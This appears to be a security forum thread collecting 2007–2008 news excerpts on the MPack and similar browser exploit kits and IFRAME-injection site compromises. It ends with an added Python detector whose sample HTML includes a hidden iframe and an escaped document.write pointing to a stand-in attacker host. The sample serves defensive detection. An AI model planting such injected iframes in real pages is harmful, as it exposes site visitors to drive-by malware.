MPack Analysis (follow-up)

2007-06-25, 11:07
RE: http://isc.sans.org/diary.html?storyid=3015

- http://blog.trendmicro.com/pornography-is-bad-for-you21/
June 22, 2007 ~ "Be careful in searching for porn sites, you may get other forms of “malicious” content that is definitely undesirable. Just a few days after the infamous Italian Job malware, Trend Micro found another one with a similar modus operandi, but instead of hacked Italian web sites, the infection chain starts on certain pornographic sites... The detections for web pages containing the obfuscated IFRAME code, as well as the script file that downloads TROJ_AGENT.QMN are still being created as of writing. This particular attack uses the toolkit MPack v0.86, the same one used in the Italian Job attack, and, despite only having 197 domains with IFRAMEs (as compared to the Italian Job’s 10,000++ domains), is able to infect twice as many as the Italian Job. It is most likely this attack was made online sometime last week, around June 17..."


2007-08-01, 14:12

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=201202240
Aug. 1, 2007 - "A hacking tool for sale in the Russian underground is in the hands of 58 criminals who have infected more than 500,000 users, according to a security research firm. The MPack toolkit is a powerful exploitation tool that launches attacks against Web browsers. Ken Dunham, a senior engineer with VeriSign-iDefense reported this summer that the toolkit leverages multiple exploits -- including the Windows ANI bug and a QuickTime overflow bug -- to compromise computers. Finjan Software, Inc., a security company, reported this week that the malware being used within MPack is going after users' bank account information, such as user names, passwords, credit card numbers and Social Security numbers. And it's a highly successful tool, with an infection ratio of 16% of 3.1 million infection attempts. "The crimeware is capable of stealing account information from several banks around the world without leaving any traces behind," Finjan researchers reported in an advisory. "Stolen data is being sent to the criminals over a secure communication channel (SSL) to avoid detection. Users whose machines were infected by this crimeware will not notice any change to their normal PC and online browsing experience. The rootkit nature of the crimeware leaves no sign and does not impact the end-user experience." To make matters even worse for users and IT managers, the malware downloaded by the MPack toolkit is still not detected by the majority of popular security products, according to Finjan. And that makes it very effective in infecting PCs... the crimeware takes over the browser and creates a copy of the real banking page in real-time so the user is further tricked into thinking they're at a legitimate site. For each financial institution, the crimeware sends a customized set of crafted forms and pages, designed to harvest the specific information needed to log into that particular service. 
The crimeware is spread by compromised, legitimate sites that have malicious code embedded in them... VeriSign-iDefense also reported that attacks from MPack date back to October 2006."
> http://www.finjan.com/Pressrelease.aspx?id=1629&PressLan=1230&lan=3
July 31, 2007

> http://isc.sans.org/diary.html?storyid=3015


2007-09-18, 16:33

- http://www.symantec.com/about/news/release/article.jsp?prid=20070917_01
Sept. 17, 2007 - "...During the reporting period of Jan. 1, 2007, through June 30, 2007, Symantec detected an increase in cyber criminals leveraging sophisticated toolkits to carry out malicious attacks. One example of this strategy was MPack, a professionally developed toolkit sold in the underground economy. Once purchased, attackers could deploy MPack’s collection of software components to install malicious code on thousands of computers around the world and then monitor the success of the attack through various metrics on its online, password protected control and management console. MPack also exemplifies a coordinated attack, which Symantec reported as a growing trend in the previous volume of the ISTR where cyber criminals deploy a combination of malicious activity. Phishing toolkits, which are a series of scripts that allow an attacker to automatically set up phishing Web sites that spoof legitimate Web sites, are also available for professional and commercial cybercrime. The top three most widely used phishing toolkits were responsible for 42 percent of all phishing attacks detected during the reporting period...
- Increase in Cyber Criminals Exploiting Trusted Environments to Target Victims...
- Rise in Multi-Staged Attacks...
- Additional Key Findings
* Credit cards were the most commonly advertised commodity on underground economy servers, making up 22 percent of all advertisements; bank accounts were in close second with 21 percent.
* Symantec documented 237 vulnerabilities in Web browser plug-ins. This is a significant increase over 74 in the second half of 2006, and 34 in the first half of 2006.
* Malicious code that attempted to steal account information for online games made up 5 percent of the top 50 malicious code samples by potential infection. Online gaming is becoming one of the most popular Internet activities and often features goods that can be purchased for real money, which provides a potential opportunity for attackers to benefit financially.
* Spam made up 61 percent of all monitored e-mail traffic, representing a slight increase over the last six months of 2006 when 59 percent of e-mail was classified as spam.
* Theft or loss of computer or other data-storage medium made up 46 percent of all data breaches that could lead to identity theft. Similarly, Symantec’s IT Risk Management Report found that 58 percent of enterprises expect a major data loss at least once every 5 years..."


2008-01-18, 20:15

- http://preview.tinyurl.com/2sf38b
Sans.org (Top 10 Cyber Security Menaces - 2008)
"...One of the latest such modules, mpack, produces a claimed 10-25% success rate in exploiting browsers that visit sites infected with the module..."


2008-02-08, 23:37
FYI... Hackers seed malware on multiple sites

- http://www.theregister.co.uk/2008/02/08/indian_av_site_compromise/
8 February 2008 - "Hackers planted malicious script on the site of an Indian anti-virus firm this week. The website of AVsoft Technologies was attacked by unidentified miscreants in order to distribute a variant of the Virut virus. AVsoft Technologies makes the SmartCOP antivirus package. One of the download pages of the site was booby-trapped with malicious code that used the infamous iFrame exploit to push copies of the Virut virus onto visiting unpatched (or poorly patched) Windows PCs. The technique is a popular method for turning the websites of legitimate organisations into sites for drive-by malware downloads. Virut opens up a backdoor on infected PCs, allowing hackers to download and run other malware (or anything else they fancy) onto infected computers..."
> http://annysoft.wordpress.com/2008/02/06/antivirus-company-website-is-infected/
8 Feb 2008 - "Malicious IFRAME has been removed... This all is used by the infamous (underground networks!!) tool 'IcePack'..."

- http://www.techworld.com/security/news/index.cfm?newsID=11361&pagtype=all
02/08/08 - "The Web site of one of the U.K.'s most famous landmarks, the Forth Road Bridge, has been torn open in embarrassing fashion to serve malware, researchers are reporting. According to the security blog of a small consultancy, Roundtrip Solutions, the Web site is now hosting an 'obfuscated' Javascript hack created using the Neosploit Crimeware Toolkit, dishing out payloads including, the blog reports, porn pop-ups... The actual code embedded on the site's web server appears to point to a server in Turkey, returning instructions directing visitors to the BBC Web site, only -occasionally- delivering a more serious Javascript payload, essentially anything its creators wished... The hack doesn't appear to have been hard for the researchers to spot using Exploit Labs' (now AVG's) Linkscanner Pro firewall-oriented scanning software. Security vendor Finjan confirmed the hack as genuine... Website hacks of this sort are becoming more common, with Neosploit, Icepack, and the well-known Mpack attack kits now in common circulation..."

- http://preview.tinyurl.com/3b5ddu
February 07, 2008 (Infoworld) - "...According to Roger Thompson, chief research officer with security vendor AVG... "They let one of their pages get hit by an iFrame injection," he said. "It shows that anyone can be a victim... It's hard to protect Web servers properly." The technique used on the site has been seen in -thousands- of similar hacks over the past few months..."
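A defender-side check for the pattern every post in this thread describes (a hidden IFRAME or an escaped document.write injected into an otherwise legitimate page), as an added example that is not from the thread or from any vendor it cites; the sample HTML, the attacker.invalid host and the thresholds are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not taken from any real compromised site): a normal
# embed, a 1x1 hidden iframe, and an escaped document.write of a third iframe.
SAMPLE_HTML = """<html><body>
<h1>Downloads</h1>
<iframe src="http://example.com/player" width="640" height="480"></iframe>
<iframe src="http://attacker.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%2E%69%6E%76%61%6C%69%64%2F%22%3E'))</script>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(left|top)\s*:\s*-\d{3,}", re.I)
ESCAPED_RUN = re.compile(r"(%[0-9a-f]{2}){8,}|(\\x[0-9a-f]{2}){8,}", re.I)

class IframeAuditor(HTMLParser):
    """Collects (kind, detail) findings while the stdlib parser walks the page."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            w, h = _dim(a.get("width")), _dim(a.get("height"))
            tiny = (w is not None and w <= 2) or (h is not None and h <= 2)
            hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
            if tiny or hidden:  # a frame the visitor cannot see has no legitimate reason to load
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # long %xx or \xNN runs fed to unescape/fromCharCode are the classic kit obfuscation
        if self._in_script and ESCAPED_RUN.search(data) and ("unescape" in data or "fromCharCode" in data):
            self.findings.append(("obfuscated_script", data.strip()[:40]))

def _dim(value):
    """Parse a width/height attribute ('1', '1px', '100%'); int pixels or None."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None

def audit_html(html):
    """Return findings for hidden iframes and escaped inline scripts in one page."""
    p = IframeAuditor()
    p.feed(html); p.close()
    return p.findings
```

Run it over a crawl of your own pages and alert on any non-empty result; the legitimate 640x480 embed in the sample is deliberately left unflagged.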